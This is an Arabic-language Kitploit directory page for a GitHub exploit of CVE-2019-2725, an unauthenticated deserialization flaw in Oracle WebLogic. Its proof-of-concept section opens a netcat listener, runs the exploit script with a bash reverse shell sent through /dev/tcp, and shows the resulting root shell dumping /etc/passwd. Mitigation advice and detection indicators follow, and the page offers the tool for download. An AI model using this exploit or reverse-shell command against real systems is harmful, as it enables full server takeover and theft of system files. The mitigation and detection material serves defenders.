Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Oracle-Weblogic-Server-AsyncResponseService-Deserialization-Remote-Code-Execution-CVE-2019-2725 — استغلال تنفيذ التعليمات البرمجية عن بُعد غير المصادق عليه لخادم Oracle WebLogic (CVE-2019-2725) عبر إلغاء التسلسل في AsyncResponseService، مما يوفر قشرة عكسية من خلال طلبات SOAP المصممة. | Kitploit
أدوات/GitHubGitHub/loursha/oracle-weblogic-server-asyncresponseservice-deserialization-remote-code-execution-cve-2019-2725
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHubloursha/oracle-weblogic-server-asyncresponseservice-deserialization-remote-code-execution-cve-2019-2725

Oracle-Weblogic-Server-AsyncResponseService-Deserialization-Remote-Code-Execution-CVE-2019-2725

استغلال تنفيذ التعليمات البرمجية عن بُعد غير المصادق عليه لخادم Oracle WebLogic (CVE-2019-2725) عبر إلغاء التسلسل في AsyncResponseService، مما يوفر قشرة عكسية من خلال طلبات SOAP المصممة.

عرض المستودع
2منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-2725 – تنفيذ التعليمات البرمجية عن بُعد بدون مصادقة في Oracle WebLogic

ثغرة في مكون خادم Oracle WebLogic من Oracle Fusion Middleware (المكون الفرعي: خدمات الويب). الإصدارات المدعومة المتأثرة هي 10.3.6.0.0 و 12.1.3.0.0. ثغرة قابلة للاستغلال بسهولة تسمح لمهاجم غير مصادق مع وصول شبكي عبر HTTP باختراق خادم Oracle WebLogic.

نظرة عامة على الثغرة

CVE ID: CVE-2019-2725
Severity: حرجة (CVSS v3: 9.8)
Vulnerability Type: تنفيذ تعليمات برمجية عن بُعد بدون مصادقة (RCE)
Affected Product: Oracle WebLogic Server
Affected Component: AsyncResponseService
Authentication Required: لا
User Interaction Required: لا

CVE-2019-2725 هي ثغرة حرجة في إلغاء التسلسل (deserialization) في Oracle WebLogic Server تسمح للمهاجمين عن بُعد غير المصادقين بتنفيذ أوامر نظام تعسفية عبر طلب SOAP مصمم خصيصًا يُرسل إلى نقطة النهاية /_async/AsyncResponseService.


الإصدارات المتأثرة

إصدارات Oracle WebLogic Server قبل التحديث النقدي لشهر أبريل 2019 (Critical Patch Update)، بما في ذلك على سبيل المثال لا الحصر:

  • WebLogic 10.3.6
  • WebLogic 12.1.3
  • WebLogic 12.2.1.3

  • وصف الثغرة

    توجد الثغرة بسبب إلغاء التسلسل غير الآمن في AsyncResponseService.
    يمكن للمهاجم إرسال حمولة XML ضارة تؤدي إلى تنفيذ أوامر تعسفية على نظام التشغيل الأساسي بدون مصادقة.

    هذه المشكلة خطيرة بشكل خاص لأن:

    • نقطة النهاية غالبًا ما تكون مكشوفة خارجيًا
    • لا يلزم وجود بيانات اعتماد صالحة
    • الاستغلال يؤدي مباشرة إلى اختراق النظام بالكامل

    سيناريو الهجوم

    1. يحدد المهاجم مثيل WebLogic مكشوف
    2. يرسل المهاجم طلب SOAP ضار إلى:
    3. يقوم WebLogic بإلغاء تسلسل البيانات التي يتحكم بها المهاجم
    4. يتم تنفيذ أوامر نظام تشغيل تعسفية
    5. يحصل المهاجم على وصول إلى شل عن بُعد

    إثبات المفهوم (PoC)

    🔹 مستمع المهاجم (واجهة سطر الأوامر الثانية)

    ابدأ مستمع Netcat لاستقبال الشل العكسي:

    root@kitploit:~
    nc -lvp 2323
    

    🔹 تنفيذ الاستغلال (واجهة سطر الأوامر الأولى)

    شغّل سكريبت الاستغلال ضد خادم WebLogic الضعيف:

    root@kitploit:~
    python3 CVE-2019-2725.py http://172.17.0.6:7001/_async/AsyncResponseService '/bin/bash -i >& /dev/tcp/172.17.0.10/2323 0>&1'
    

    المخرجات المتوقعة:

    root@kitploit:~
    [+] Target appears VULNERABLE
    [*] Sending payload...
    [+] Payload delivered successfully (HTTP 202)
    

    🔹 نتيجة الاستغلال الناجح

    على مستمع Netcat، يتم استقبال شل عكسي:

    root@kitploit:~
    Listening on 0.0.0.0 2323
    Connection received on 172.17.0.6 39926
    bash: cannot set terminal process group (1): Inappropriate ioctl for device
    bash: no job control in this shell
    root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#
    
    root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain# whoami
    root
    root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#
    
    root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain# pwd
    /root/Oracle/Middleware/user_projects/domains/base_domain
    root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#
    
    root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain# cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    libuuid:x:100:101::/var/lib/libuuid:
    syslog:x:101:104::/home/syslog:/bin/false
    root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#
    

    التخفيف والإصلاح

    الإجراءات الموصى بها

    1. تطبيق التحديث النقدي لشهر أبريل 2019 من Oracle (CPU)
    • قم بترقية Oracle WebLogic Server إلى إصدار يتضمن الإصلاحات الأمنية لشهر أبريل 2019 التي قدمتها Oracle https://www.oracle.com/security-alerts/alert-cve-2019-2725.html
    1. تقييد الوصول إلى نقطة النهاية الضعيفة
    • هذا يؤكد تنفيذ الأوامر عن بُعد والوصول على مستوى النظام.
    • تأكد من عدم تعرض نقطة النهاية هذه للشبكات غير الموثوقة
    • قصر الوصول على نطاقات IP الداخلية أو الموثوقة فقط
    1. حظر الوصول غير الموثوق باستخدام ضوابط الشبكة
    • تنفيذ قواعد جدار حماية صارمة
    • فرض التحكم في الوصول عبر الوكلاء العكسيين (reverse proxies)
    • تعطيل الوصول الخارجي غير الضروري إلى خدمات إدارة WebLogic والخدمات غير المتزامنة
    1. تمكين التسجيل والمراقبة المستمرة
    • مراقبة سجلات الوصول HTTP
    • التنبيه على أنماط الطلبات غير الطبيعية التي تستهدف نقاط النهاية غير المتزامنة

    مؤشرات الكشف

    🔍 مؤشرات الشبكة والتطبيق

    • طلبات إلى:
    • حمولات SOAP/XML مشبوهة أو غير صحيحة
    • استجابات HTTP 202 Accepted المتكررة من الخدمات غير المتزامنة

    🔍 مؤشرات على مستوى المضيف

    • اتصالات شبكة صادرة بدأها خادم WebLogic
    • تنفيذ شل غير متوقع مثل:
    • /bin/bash
    • /bin/sh
    • إنشاء اتصالات شل عكسي إلى عناوين IP أو منافذ غير معروفة

    توصيات المراقبة الأمنية

    • تمكين توقيعات IDS/IPS لأنماط استغلال WebLogic SOAP المعروفة
    • مراقبة حركة المرور الصادرة من خوادم WebLogic
    • تنفيذ مبدأ الامتياز الأقل (least-privilege) لخدمات التطبيقات
    • مراجعة سجلات تنفيذ عمليات WebLogic بانتظام

    الإسناد

    تمت الإشارة إلى المستودعات العامة التالية لفهم والتحقق من الاستغلال:

    • https://github.com/lufeirider/CVE-2019-2725
    • https://github.com/pimps/CVE-2019-2725
    تنزيل الأداة